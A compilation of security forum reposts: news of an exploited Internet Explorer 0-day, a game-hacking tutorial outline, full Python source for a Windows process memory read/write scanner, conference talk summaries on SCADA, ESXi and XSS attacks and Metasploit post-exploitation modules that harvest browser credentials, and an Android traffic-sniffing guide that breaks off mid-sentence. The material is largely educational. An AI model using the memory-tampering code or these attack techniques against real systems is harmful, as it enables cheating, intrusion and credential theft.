Nytro

[h=1]Exploited 0-day vulnerability in Internet Explorer discovered[/h] 02 January 2013 [h=2]At the very end of last year a new 0-day exploit against IE6, 7 and 8 was discovered in wild. Microsoft has released a temporary Fix-it pending a formal patch.[/h] The discovered attack appears to have been a water hole attack linked to the Elderwood project, using the Council on Foreign Relations (CFR) website. Water hole attacks first locate and compromise a site likely to be of interest to the intended targets, and then wait for those targets to come visiting. In this instance a 0-day vulnerability affecting Internet Explorer versions 6 to 8 was exploited to infect susceptible visitors. There is some suggestion that the targets include Chinese dissidents. Although the infected website is in New York, the exploit only triggers if the visiting browser is Chinese, Chinese (Taiwan), Japanese, Korean, or Russian. “The vulnerability present in Internet Explore 8 seems to be a user-after-free,” explains Jaime Blasco of AlienVault. “The exploit is able to exploit both Windows XP and Windows 7 bypassing both data execution (DEP) and address space layout randomization (ASLR) protections.” IE9 and 10 users are not vulnerable. If the exploit code is successful and a payload is implanted on the target, it attempts to connect to a C&C server that can download further malware. Although the discovered attack targeted a specific website, other users of the vulnerable IE versions should not ignore the threat. “There is now a Metasploit module (ie_cdwnbindinfo_uaf) that emulates this attack,” warns the Internet Storm Center, “meaning this will move in to mainstream exploitation rapidly, thus mitigation steps should be taken so soon as possible.” The best protection against exploits for this vulnerability, suggests Microsoft, is for the vulnerable code to not be present. Internet Explorer 9 or 10 do not include the vulnerable code. Where possible, then, the solution should be to upgrade to IE9 or IE10 as soon as possible. Where this is not possible – either through company policy or use of Windows XP which does not support IE9 or IE10 – users should apply the Microsoft Fix-it, or switch to a different browser. “If you are using IE9 or IE10, today is your lucky day, because you are not vulnerable to this. For those who are using older versions of IE such as 8 -- what's the matter with you?” comments sinn3r in the Rapid7 Metasploit blog. Microsoft has released a security advisory (2794220) with details of the vulnerability, and provided a Fix-it with details on how to implement it. Sursa: Infosecurity - Exploited 0-day vulnerability in Internet Explorer discovered

[h=1][C/C++] Reverse Engineering Tutorial for newbies[/h][h=3]Muted[/h] --------------------------------------------------------- ---===> Reverse Engineering Tutorial <===--- --==> For Beginners <==-- on Windows --------------------------------------------------------- -= SECTION 1 (Misc. information) =- I. WHAT THIS TUTORIAL WILL COVER II. PREFACE III. REQUIREMENTS IV. RECOMMENDATIONS -= SECTION 2 (WPM hack) =- I. WHAT TO HACK/HOW TO DO IT II. THE "GAME" III. THE MEMORY SEARCHER IV. TYING IT ALL TOGETHER (WPM) -= SECTION 3 (DLL hack) =- I. ADVANTAGES TO CODE INJECTION II. HOW TO CREATE A BASIC DLL III. DLL FILES -> MORE IN DEPTH IV. FINDING MEMORY ADDRESSES (OllyDbg) V. HOW 'JUMP PATCHING' WORKS VI. CALLING A FUNCTION FROM WITHIN APPENDIXES: A. How to create a DLL project (MSVC, Dev-C++, etc) B. TextControl header file C. Links to function prototypes used (MSDN site) D. WPM Hack (source code) E. DLL Hack (source code) F. DLL Injector (source code) - I take no credit for this G. The game (source code, "Hack me") ------------------------------------------------------------------------------------------------------------------- Section 1 WHAT THIS TUTORIAL WILL COVER: - General theory behind 'hacking' games - Usage of (C/C++) WriteProcessMemory function - Injection of code (patch jumping to a user-defined *.dll) PREFACE (skip if you want): This tutorial is aimed in a very general direction, towards helping people who have never really 'hacked' anything before, but want to try. Somebody who may, or may not have knowledge in the 'field' area, of hacking. If you've never hacked before, but used them, and used memory searchers before, this is for you to read! If you've created a few hacks before, but never tried to inject a *.dll before, or created a patch jump... This tutorial might be for you, but then again, you may already know, but never really have done it. REQUIREMENTS: - Knowledge of C or C++ (if you've only coded in C, know that "naked" is a C++ only keyword) - A compiler that is capable of inline, Intel syntax Assembly (MSVC is, but is not share/freeware) RECOMMENDATIONS: - Knowledge of basic Assembly (extremely helpful) - Knowledge of how to use a memory searcher (TSearch, ArtMoney, or another) - Knowledge of how to use a debugger (OllyDbg, SoftIce) - Knowledge of how computers function, in general (memory addresses, virtual memory addresses, etc) Tutorial: http://www.rohitab.com/discuss/topic/35537-cc-reverse-engineering-tutorial-for-newbies/

[h=1]process_memory_scanner.py[/h]By [h=3]cadaver[/h] # process_memory_scanner.py by Cadaver # this is written for Python 2.7 and tested on windows 7 64bit with 32bit processes. # it can scan an entire process for a integer value in under half a second. # it can also scan for any ctype within python ctypes or ctypes.wintypes modules \ # simply by creating an instance of the type and passing it as the target to the Scanner class. # license: public domain import gc from ctypes import * from time import time, sleep from ctypes.wintypes import * from threading import Thread from struct import calcsize, pack, unpack, Struct from win32gui import PyGetString, PySetString from win32process import GetProcessMemoryInfo from win32api import GetCurrentProcessId, GetCurrentProcess, CloseHandle from win32con import MEM_FREE, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_QUERY_INFORMATION from win32con import PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY from win32con import PAGE_EXECUTE_READ, PAGE_READONLY, PROCESS_VM_OPERATION, PROCESS_ALL_ACCESS DEBUG_QUERY = False # print VirtualQueryEx info. DEBUG_SLICE = False # print Python string slice detailed used for comparison. DEBUG_EXCEPTIONS = False # print some ignored exceptions that might occure. DEBUG_ALIGNMENT = False # print alignment info. DEBUG_COMPARE = False # print compare info ASSUME_ALIGNMENT = True # assume any non string type could be byte aligned. ACCESS = PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION WRITABLE = PAGE_READWRITE | PAGE_WRITECOPY |PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY READABLE = PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_READONLY | PAGE_READWRITE MEMORY_STATES = {0x1000: "MEM_COMMIT", 0x10000: "MEM_FREE", 0x2000: "MEM_RESERVE"} MEMORY_PROTECTIONS = {0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGEEXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY", 0x01: "PAGE_NOACCESS", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY"} MEMORY_TYPES = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"} # debug function to time an operation. def timeit (func): import time t1 = time.time () ret = func() print "Time taken:", time.time () - t1 return ret class MEMORY_BASIC_INFORMATION (Structure): _fields_ = [ ("BaseAddress", c_void_p), ("AllocationBase", c_void_p), ("AllocationProtect", DWORD), ("RegionSize", UINT), ("State", DWORD), ("Protect", DWORD), ("Type", DWORD) ] class PyMEMORY_BASIC_INFORMATION: def __init__ (self, MBI): self.MBI = MBI self.set_attributes () def set_attributes (self): self.BaseAddress = self.MBI.BaseAddress self.AllocationBase = self.MBI.AllocationBase self.AllocationProtect = MEMORY_PROTECTIONS.get (self.MBI.AllocationProtect, self.MBI.AllocationProtect) self.RegionSize = self.MBI.RegionSize self.State = MEMORY_STATES.get (self.MBI.State, self.MBI.State) #self.Protect = self.MBI.Protect # uncomment this and comment next line if you want to do a bitwise check on Protect. self.Protect = MEMORY_PROTECTIONS.get (self.MBI.Protect, self.MBI.Protect) self.Type = MEMORY_TYPES.get (self.MBI.Type, self.MBI.Type) class SYSTEM_INFO(Structure): _fields_ = [("wProcessorArchitecture", WORD), ("wReserved", WORD), ("dwPageSize", DWORD), ("lpMinimumApplicationAddress", DWORD), ("lpMaximumApplicationAddress", DWORD), ("dwActiveProcessorMask", DWORD), ("dwNumberOfProcessors", DWORD), ("dwProcessorType", DWORD), ("dwAllocationGranularity", DWORD), ("wProcessorLevel", WORD), ("wProcessorRevision", WORD)] class TARGET: """Given a ctype (initialized or not) this coordinates all the information needed to read, write and compare.""" def __init__ (self, ctype): self.alignment = 1 self.ctype = ctype # size of target data self.size = sizeof (ctype) self.type = ctype._type_ # get the format type needed for struct.unpack/pack. while hasattr (self.type, "_type_"): self.type = self.type._type_ # string_buffers and char arrays have _type_ 'c' # but that makes it slightly slower to unpack # so swap is for 's'. if self.type == "c": self.type = "s" # calculate byte alignment. this speeds up scanning substantially # because we can read and compare every alignment bytes # instead of every single byte. # although if we are scanning for a string the alignment is defaulted to 1 \ # (im not sure if this is correct). elif ASSUME_ALIGNMENT: # calc alignment divider = 1 for i in xrange (4): divider *= 2 if not self.size % divider: self.alignment = divider # size of target ctype. self.type_size = calcsize (self.type) # length of target / array length. self.length = self.size / self.type_size self.value = getattr (ctype, "raw", ctype.value) # the format string used for struct.pack/unpack. self.format = str (self.length) + self.type # efficient packer / unpacker for our own format. self.packer = Struct (self.format) def get_packed (self): """Gets the byte representation of the ctype value for use with WriteProcessMemory.""" return self.packer.pack (self.value) def __str__ (self): return str (self.ctype) [:10] + "..." + " <" + str (self.value)[:10]+ "..." + ">" class LOCK: """Locks a value to process memory by writing to it in a loop.""" def __init__ (self, process_handle, address, target, interval=0.001): self.process_handle = process_handle self.address = address self.target = target self.interval = interval self.lock_ = True def thread_lock (self): self.lock_ = True process_handle = self.process_handle address = self.address target = self.target interval = self.interval while self.lock_: write_target (process_handle, address, target) sleep (interval) def stop (self): self.lock_ = False def start (self): self.lock_ = True Thread (None, self.thread_lock).start () def __del__ (self): self.stop () def OpenProcess (pid=GetCurrentProcessId()): phandle = windll.kernel32.OpenProcess (\ ACCESS, #PROCESS_ALL_ACCESS, # alternative access right for debugging. False, pid ) assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1] return phandle def VirtualQueryEx (process_handle, address): MBI = MEMORY_BASIC_INFORMATION () MBI_pointer = byref (MBI) size = sizeof (MBI) success = windll.kernel32.VirtualQueryEx ( process_handle, address, MBI_pointer, size ) assert success, "VirtualQueryEx Failed with success == %s.\n%s" % (success, WinError (GetLastError ()) [1]) assert success == size, "VirtualQueryEx Failed because not all data was written." return PyMEMORY_BASIC_INFORMATION (MBI) def VirtualProtectEx (process_handle, address, size, new_protection): old_protection = DWORD () old_protection_pointer = byref (old_protection) success = windll.kernel32.VirtualProtectEx ( process_handle, address, size, new_protection, old_protection_pointer ) assert success, "VirtualProtectEx Failed with success == %s.\n%s" % (success, WinError (GetLastError ()) [1]) return old_protection.value def ReadMemory (process_handle, address, size): cbuffer = c_buffer (size) success = windll.kernel32.ReadProcessMemory ( process_handle, address, cbuffer, size, 0 ) assert success, "ReadMemory Failed with success == %s and address == %s and size == %s.\n%s" % (success, address, size, WinError (GetLastError()) [1]) return cbuffer.raw def WriteMemory (process_handle, address, data): """Writes string data to process and returns success.""" size = len (data) success = windll.kernel32.WriteProcessMemory (\ process_handle, address, data, size, 0 ) assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1] return success def write_target (process_handle, address, target): # target can be a ctype initialized with value. """Writes TARGET instance to address.""" if not isinstance (target, TARGET): target = TARGET (target) return WriteMemory (process_handle, address, target.get_packed()) def read_target (process_handle, address, target): # target can be a ctype initialized with value. """Reads TARGET instance from address and returns the unpacked python equivalent.""" if not isinstance (target, TARGET): target = TARGET (target) bytes_ = ReadMemory (process_handle, address, target.size) return target.packer.unpack (bytes_) [0] def scan_page (process_handle, page_address, target): # target must be TARGET instance. eg TARGET (c_int (123)). """Scans the entire page for TARGET instance and returns the next page address and found addresses.""" information = VirtualQueryEx (process_handle, page_address) base_address = information.BaseAddress region_size = information.RegionSize next_region = base_address + region_size size = target.size format_ = target.format target_value = target.value step = target.alignment unpacker = target.packer.unpack found = [] # Filter out any pages that are not readable by returning the next_region address # and an empty list to represent no addresses found. if information.Type != "MEM_PRIVATE" or \ region_size < size or \ information.State != "MEM_COMMIT" or \ information.Protect not in ["PAGE_EXECUTE_READ", "PAGEEXECUTE_READWRITE", "PAGE_READWRITE"]: return next_region, [] if DEBUG_QUERY: print vars (information) # read the whole page into buffer. page_bytes = ReadMemory (process_handle, base_address, region_size) # iterate over the page buffer bytes in steps of alignment # and unpack those bytes into the format described by # TARGET instance, then compare with TARGET. for i in xrange (0, (region_size - size), step): partial = page_bytes [i:i + size] if unpacker (partial) [0] == target_value: found.append (base_address + i) if DEBUG_SLICE: print "Found at address: %s i: %s Partial: %s Len_Partial: %s Alignment: %s." \ % (base_address+i, i, partial, len(partial), step) if DEBUG_COMPARE: print "Unpacked: %s Partial: %s" % (repr(unpacker (partial)[0]), repr(target_value)) del page_bytes # free the buffer return next_region, found def scan_addresses (process_handle, addresses, target): """Scans addresses and returns a dictionary of {address: value}.""" values = {} for address in addresses: try: value = read_target (process_handle, address, target) except Exception, error: # the process may of freed the page while we are scanning. if DEBUG_EXCEPTIONS: raise continue values [address] = value return values def scan_addresses_for_target (process_handle, addresses, target): """Scan addresses and returns a list of those addresses that match the target value.""" target_value = target.value found = list () values = scan_addresses (process_handle, addresses, target) for address, value in values.items (): if value == target_value: found.append (address) return found def scan_addresses_for_change (process_handle, addresses, target): """scan addresses and returns a list of those addresses that don't match the target value.""" target_value = target.value found = list () values = scan_addresses (process_handle, addresses, target) for address, value in values.items (): if value != target_value: found.append (address) return found def scan_process (process_handle, target): """scans a processes pages for the target value.""" if not isinstance (target, TARGET): target = TARGET (target) if DEBUG_ALIGNMENT: print "Target: %s Size: %s Alignment: %s." % (target.ctype, target.size, target.alignment) si = SYSTEM_INFO () psi = byref (si) windll.kernel32.GetSystemInfo (psi) # get the first address of the first page to scan so we know where to start scanning base_address = si.lpMinimumApplicationAddress # get the last address to scan so we know when to stop scanning. max_address = si.lpMaximumApplicationAddress found = list () page_address = base_address while page_address < max_address: next_page, f = scan_page (process_handle, page_address, target) found.extend (f) page_address = next_page if len (found) >= 60000000: print "[Warning] Scan ended early because too many addresses were found to hold the target data." break gc.collect () return found class Scanner: def __init__ (self, pid, ctype=None): self.pid = pid self.process_handle = OpenProcess (pid) self.target = None self.found = list () self.locks = list () if ctype: self.set_target (ctype) def set_target (self, ctype): self.target = TARGET (ctype) def scan_process(self): self.found = scan_process (self.process_handle, self.target) print len (self.found), "Addresses with value %s found." % (self.target) def scan_for_change (self): self.found = scan_addresses_for_change (self.process_handle, self.found, self.target) print len (self.found), "Addresses with NOT value %s found." % (self.target) def scan_for_new_target (self, ctype): target = TARGET (ctype) self.found = scan_addresses_for_target (self.process_handle, self.found, target) print len (self.found), "Addresses with new value %s found." % (self.target) def scan_addresses (self, addresses=None): if not addresses: addresses = self.found return scan_addresses (self.process_handle, addresses, self.target) def write_target (self, address, target): return write_target (self.process_handle, address, target) def read_target (self, address, target): return read_target (self.process_handle, address, target) def lock_target (self, address, target): if not isinstance (target, TARGET): target = TARGET (target) lock = LOCK (self.process_handle, address, target) lock.start () self.locks.append (lock) def stop_locks (self): for lock in self.locks: lock.stop () self.locks = list () def __del__ (self): del self.found if self.process_handle: CloseHandle (self.process_handle) def test (): global PID, p, s, a, na PID = GetCurrentProcessId () #p = OpenProcess () s = Scanner (PID, create_string_buffer ("teststringthing")) # s = Scanner (PID, c_int (123)) print "Scanning process." timeit (s.scan_process) a = s.found [0] print "Locking found[0]." s.lock_target (a, create_string_buffer ("new str")) print "Writing target." s.write_target (a, create_string_buffer ("new str 2")) print "Scanning for changes." s.scan_for_change () print "Scanning for new target." s.scan_for_new_target (c_int (1)) print "Scanning addresses." s.found = [a] na=s.scan_addresses () print "Reading target." r = s.read_target (a, c_int) print "Writing target." s.write_target (a, create_string_buffer ("test")) s.write_target (a, c_double (88.8)) s.write_target (a, c_int (123)) s.write_target (a, c_float (1.2)) s.stop_locks () Scanner.__doc__ = """ class Scanner: This is the main scanner class that attempts to provide a tidy API for scanning a remote process for values. def __init__ (self, pid, ctype=None): This is the initializer that takes the process iD and any ctype from the ctype module or wintype from the wintype module as the type and value we want to scan for eg c_int (1) - if we want to search for a integer of value 1, or create_string_buffer ("test") - if we want to search for a string of value 'test'. def set_target (self, ctype): Sets the ctype (with value) of the data we want to search for. def scan_process(self): Scans the process for target and saves the found addresses in self.found. def scan_for_change (self): Scans the addresses in self.found for any value that isnt the target value and saves these new addresses in self.found. def scan_for_new_target (self, ctype): Scans the addresses in self.found for a new value and returns the ones that match. def scan_addresses (self, addresses=None): Scans the addresses and returns a dictionary of {address, value}. def write_target (self, address, target): Writes the data described by target to the address. def read_target (self, address, target): Reads the data described by target from address. def lock_target (self, address, target): Locks address to target value. def stop_locks (self): Terminates all current locks. """ if __name__ == "__main__": print Scanner.__doc__ raw_input ("[paused]") This is written in Python 2.7 and requires Pythons win32 extensions. Sursa: process_memory_scanner.py - rohitab.com - Forums

Crypto And The Cops: The Law Of Key Disclosure And Forced Decryption Description: Can the government force you to turn over your encryption passphrase or decrypt your data? The law surrounding police attempts to force decryption is developing at breakneck speed, with two major court decisions this year alone. This talk will start off with an in-depth explanation of the Fifth Amendment privilege against self-incrimination, its origins, and how it applies to government attempts to force disclosure of keys or decrypted versions of data in the United States. We'll also discuss law enforcement authority to demand passphrases and decryption of data stored with third parties, and survey key disclosure laws in other countries. Marcia Hofmann is a senior staff attorney at the Electronic Frontier Foundation, where she works on a broad range of digital civil liberties issues including computer security, electronic privacy, and free expression. She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes innovation and protects the rights of curious tinkerers and researchers in their cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff counsel and director of the Open Government Project at the Electronic Privacy Information Center (EPIC). Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Crypto And The Cops: The Law Of Key Disclosure And Forced Decryption

Esxi Beast Description: ESXI BEAST Exploiting VMWARE ESXi Binary Protocols Using CANAPE This presentation will cover a demonstration of the new version of the Canape protocol analysis tool being released for Ruxcon. During the course of the presentation various attack scenarios against the VMWare ESXi binary protocol will be demonstrated using Canape. The VMWare ESXi protocol is a complex multi-layered protocol which transitions between many protocol states throughout a connection lifetime. The protocol uses multiplexed frames, compression and encryption all over a single TCP connection. The talk will discuss and outline serious weaknesses within the ESXi protocol and how these can be leveraged from within Canape. During the talk, new features of Canape will be demonstrated live to show the audience how the tool can be used from traffic interception and initial protocol dissection through data injection and fuzzing and finally demonstrating full PoC exploitation all within Canape. Presentation outline: What is Canape Examining the VMWare ESXi protocol Demonstrating ESXi protocol interception Intercepting the ESXi encryption Data injection to brute force user credentials Fuzzing ESXi 0day demonstration Questions Testing and exploiting binary network protocols can be both complex and time consuming. More often than not, custom software needs to be developed to proxy, parse and manipulate the target traffic. Canape is a network protocol analysis tool which takes the existing paradigm of Web Application testing tools (such as CAT, Burp or Fiddler) and applies that to network protocol testing. Canape provides a user interface that facilitates the capture and replaying of binary network traffic, whilst providing a framework to develop parsers and fuzzers. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Esxi Beast

Scada Strangelove Description: SCADA STRANGELOVE or: How I Learned to Start Worrying and Love Nuclear Plants Modern civilization unconditionally depends on information systems. It is paradoxical but true that ICS/SCADA systems are the most insecure systems in the world. From network to application, SCADA is full of configuration issues and vulnerabilities. During our report, we will demonstrate how to obtain full access to a plant via: a sniffer and a packet generator FTP and Telnet Metasploit and oslq a webserver and a browser About 20 new vulnerabilities in common SCADA systems including Simatic WinCC will be revealed. Releases: modbuspatrol (mbpatrol) – free tool to discover and fingerprint PLC Simatic WinCC security checklist Simatic WinCC forensic checklist and tools close to real life attack scenario of a Simatic WinCC based plant Intro 1.1 Who we are? 1.2 History of research Overview of ICS/SCADA architecture SCADA network puzzle 3.1 Overview of protocols used in SCADA networks 3.2 Modbus overview 3.3 S7 overview 3.4 Modbus/S7 SCADA/PLC fingerprint (release mbpatrol - free tool for PLC fingerprint) Who is mister PLC? 4.1. Typical PLC architecture 4.2. Security and configuration issues 4.3. Coordinated disclosure of vulnerabilities in several PLC DEMO. Owning plant with ftp and telnet. During demo, I will demonstrate how several vulnerabilities and configuration issues of PLC can be used to get root access to the device, install rootkit and manipulate something in real world. Miss SCADA 6.1. Place of OS and DB in security of SCADA infrastructure 6.2. Simatic WinCC default configuration issues 6.3. Ways to abuse OS and DB vulnerabilities 6.4. Coordinated disclosure of several OS/DB WinCC vulnerabilities 6.5. Simatic WinCC security checklist 6.6. Simatic WinCC postexploitation/forensic Heavy weapon 7.1. SCADA/HMI application architecture (based on Simatic WinCC) 7.2. Clients-side in SCADA network? (release of client-site fingerprint tool for HMI software) 7.3. Coordinated disclosure of vulnerabilities in Siemens Simatic WinCC 7.0 used in exploit. Architecture of exploit DEMO. Owning plant with browser. Exploit scenario. Several 0-day (but responsible disclosed) vulnerabilities in Siemens Simatic WinCC 7.0 used to: Fingerprint presence of WinCC client software Obtain access password to WinCC WebNavigator interface Read registry and files on WinCC box View and manage HMI /PLC/technological process from internet via browser of operator 10 PS. Why physical separation is not enough Will we tell about 0-day vulnerabilities? Yes, but we will coordinate with vendor. So list of vulnerabilities depended on patching speed of Siemens. Will instruments be presented? 29C3: SCADA Strangelove Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Scada Strangelove

Owasp Xenotix Xss Exploit Framework 2012 V2 Description: Features of Xenotix XSS Exploit Framework Built in XSS Payloads XSS Key logger XSS Executable Drive-by downloader Automatic XSS Testing XSS Encoder XSS Reverse Shell (new) Download: https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Owasp Xenotix Xss Exploit Framework 2012 V2

Post Exploitation - System Information Gathering Description: In this video I will show you how to use Interesting Post – Exploitation Modules for Windows. So I’m going to use four Post – Exploitation Modules. 1 post/windows/gather/enum_applications This module will Dump All the list of Installed Application With Versions. 2 post/windows/gather/usb_history This Module will show you victims USB_History. 3 post/windows/gather/enum_devices This module for Enumerating Hardware. 4 post/windows/gather/enum_chrome This module is very interesting – using this module you will get all the information about chrome browser – Information like, Web Data, Coockie History, Login Data bookmarks, Preferences etc .. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Post Exploitation - System Information Gathering

Hackers As A High-Risk Population Description: HACKERS AS A HIGH-RISK POPULATION Harm Reduction Methodology Hackers are a high-risk population. This talk will provide hackers with tools to reduce the risk to themselves and their communities using harm reduction methodology. Hacktivism, social networks, hacking’s learning opportunities, grey area use of communication tools by revolutionaries and countermovements, information transparency opportunities, privacy and security abuse and user risk situations all share one central tension: resolving ethical decisions around potentially harmful behavior. At the same time, those who confuse information with advocacy perceive much of what we do – and discuss – as dangerous. This talk will provide hackers with tools to reduce the risk to themselves and their communities. We’ll examine the similarities between extreme risk populations and the risk / harm situations hackers find themselves in – especially those with exceptional access, power or talent. Importantly, I’ll explain how the controversial – yet effective – harm reduction model can be used specifically as a tool for at-risk hackers, and those faced with decisions that may result in perceived or actual harm. The talk begins with an overview of harm reduction and its roots in reducing risk in European drug culture. We’ll also look at how it is currently used hands-on in the US by urban activists/educators/crisis volunteers such as myself to effectively educate and reduce risk in high-risk, typically underserved, populations. Threaded throughout the talk is the idea that informed consent practices and the acceptance that harmful behavior is immutable can be effective tools to solve ethical decisions. Used on a wider scale, harm reduction in this light can be used to change the cultural conversation when black vs. white solutions (“just say no,” jailing those who publish information or “real names” policies) are unsuccessfully applied to complex problems (drug abuse, abusive use of information, using pseudonyms for harm). We’ll examine instances in which harm reduction would minimize damage (including the “gentleman’s agreement” between hackers), and failures when harm reduction could have mitigated failure or worse. We will specifically look at harm reduction as applied to hacktivism, social networks, hacking’s learning opportunities, grey area use of communication tools by revolutionaries and countermovements, information transparency opportunities, privacy and security abuse, and user risk events. For over a decade I have taught harm reduction methodology and practice in San Francisco, California to global health students, nurses, doctors, outreach and clinic workers, counselors and therapists. The primary organization I do this with is a twice-yearly training for healthcare professionals so they are able to treat populations on the fringes and who live in danger. Additionally, I have instructed and applied harm reduction methods to volunteer work I’ve done to bridge homeless and at-risk youth with neighborhood residents to foster safer quality of life. The third arena in which I instruct and apply harm reduction is a twice-yearly live-action, on-site refugee crisis simulation lead in conjunction with UCSF’s Global Heath Program in which volunteers for [NGO] organizations such as Doctors Without Borders and Red Cross are intensely prepared for emergency refugee relief events. It is with all this work that I see the lens with which the HR methods can seriously benefit the edge-case and high-risk scenarios hackers often find themselves in. PDF : - http://events.ccc.de/congress/2012/Fahrplan/attachments/2228_Harm%20Reduction Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Hackers As A High-Risk Population

Sniffing Network Traffic on Android Dejan Lukan December 31, 2012 Introduction There has been a lot of talk about how to connect your laptop though the Android network and use the bandwidth that you’re already paying for. Usually, this requires setting up an access point on an Android device and connecting to it with the laptop. On some devices you have to root the phone to be able to do that, but on newer devices this functionality is already included in the Android itself and we don’t even need to install a special application anymore. All we need to do is configure the access point in settings and connect to it. In this article we won’t talk about how to connect your laptop to the Android access point, but rather the opposite. We’ll be connecting the Android device to the laptop-enabled access point. But why would we do that? The main reason is not related to using the network over the phone (quite the contrary: the laptop should have a valid Internet connection already). We’re doing it because we want to sniff everything the Android device sends and receives over the network. There are a couple of ways to achieve that. One of them is to set a specific application to use a proxy, but the application has to support that setting, and most of them don’t. Another option is to use a system-wide proxy, so all Internet communication goes through it, but that method isn’t as reliable as the option we’ll be using. We’ll set up an access point on our laptop and connect to it via the mobile phone. We need to be aware that there are other options for sniffing the traffic from the Android device, like changing the IP tables on the phone, but they all require a rooted phone, which we don’t want. We want to use the Android device without rooting it and blowing our warranty. Option 1: Changing the Proxy Settings The first thing we need to do when trying to sniff the communication of the specific application on the Android is to connect the Android phone and a laptop to a local area network. This way, both devices will obtain the IP address from the same local host network. In our case we’re going to use the IP address range 192.168.1.0/24. Additionally, we also have to set-up a Burp proxy on our laptop, so we’ll be able to intercept requests made by the Android phone. To set up Burp, we must first download it and start it; it should automatically start listening on a predefined port, which is 8080. If this port is already in use it will use another port, but it doesn’t really matter which port it chooses right now, because we’re going to configure it ourselves anyway. First, let’s start up Burp and check if it starts to listen on the appropriate port. We can do that with the use of the netstat command in Linux. The actual command we have to run is shown below: # netstat -landtp | grep java tcp6 0 0 127.0.0.1:8080 :: LISTEN 31 We can see that Burp is listening on the default predefined port 8080, but there’s also one interesting thing; it’s listening on 127.0.0.1 address. This is the local host address, so the Android device, which has a different IP, won’t be able to connect to it. We need to configure Burp to use global IP address 0.0.0.0, which is used to listen for traffic on all interfaces, not just the local host lo interface. In order to do that, we must go to Proxy–Options under Burp, which will look like the picture below: We can see that Burp is successfully listening on the port 8080, as we already saw. There’s also a check in the loopback only option. This is exactly the option we need to disable. First, we must stop the proxy on port 8080; we can do this by clicking on the check box icon in the running column. After that the Burp proxy will stop and we will be able to load the configuration by clicking on the button edit. The configuration options will then look as follows: Now we must disable the “listen on loopback interface only” option and click on the update button. Burp will then ask us if we really want to start listening on all interfaces and we must press yes. Then we must restart the Burp proxy by enabling it in the running column. The Burp proxy should then be listening on all interfaces, which means we’ll be able to connect to it from the Android phone. Let’s check if the Burp proxy is really listening on all interfaces, with the same netstat command we already used. The output of the command is shown below: # netstat -landtp | grep java tcp6 0 0 :::8080 :: LISTEN 3 Great, Burp is now listening on port 8080 on all interfaces. Remember that you can as easily change the port to a number of your liking, so you don’t have to use 8080 if you don’t like or if you already have some other service listening on that port. Now we need to configure our Android phone to use a proxy. We can do that by changing the settings of the network we’re already connected to. In order to that that, we need to open the Wireless settings and enter the advanced options for the currently connected network. After that we’ll be able to see the “Proxy settings,” where we need to select “Manual”. Then we need to enter the IP address of our laptop computer and the port 8080 we configured Burp to use. Then save the settings. After that we can start any application we want and, if we’re lucky, some packets will start flowing through Burp. We first started the Gmail application, but it didn’t work. This is because some applications don’t honor the proxy being set in the network settings, so it doesn’t really work for all applications, but it does for some. Next we started an application that we won’t mention by name, and we received some traffic in Burp. The traffic can be seen on the picture below: Cool. The first four packets are being sent because the application uses advertisements that are being downloaded from Google servers. And the last packet is actually the application-specific packet that sends a score of some kind on the server. We are also beginning to understand the API interface that the application uses to expose its features to the clients. We can also see the headers that are being generated when the GET request is being sent over the network. This is all right, but so what? We can only sniff HTTP protocol and it only works for some applications, while we can’t sniff the traffic being sent by other applications. You might say that this is lame, but it actually isn’t; later we’ll talk about techniques which we can use to sniff the HTTP traffic from every application out there, no matter which API functions it uses to bypass the proxy settings. Wait, isn’t Burp able to intercept the HTTP and HTTPS traffic? So why are we only able to intercept HTTP traffic? Yes, Burp is able to intercept both clear text HTTP protocol and encrypted HTTPS protocol. The idea is that, when an application on Android tries to use the HTTPS, it first checks the certificate chain, which must be signed by the trusted certificate authority to be able to continue. For example: if we visit some HTTPS link in the Opera web browser, the web browser will display a warning saying that the web site is using a certificate that can’t be trusted and give us the choice to choose whether we would like to continue browsing or cancel the request. If we continue browsing, we’re essentially trusting the invalid certificate, which means in such cases that we’ll be able to intercept traffic using the encrypted HTTPS protocol. But this is a web browser, which should ask the users of they want to continue browsing, because a lot of web sites today use non-signed certificate that can be trusted. Thus we need to be able to continue browsing. But this isn’t so easy with various other applications. What if some web application is trying to send a GET request through the encrypted HTTPS protocol using some API function call that’s natively supported by the Android? Well, in such cases, that function doesn’t have the means to ask the user if he wants to trust the certificate or not; it just succeeds or fails, depending on how the applications was programmed to behave. If the function call accepts the invalid non-signed certificate, then everything will still work and we will be able to intercept traffic through HTTPS; but the default option is to not trust the non-signed certificate and most applications use the default option. Why would anyone enable the less secure non-default option that, first of all, isn’t secure and, second of all, requires more work? There’s only one reason: the programmer of that application doesn’t want to pay for the trusted certificate, but he still wants to send all the data over the encrypted HTTPS tunnel. But really, how many Android programmers like that are out there? Not many, which is why most of the applications will have default settings that reject the invalid 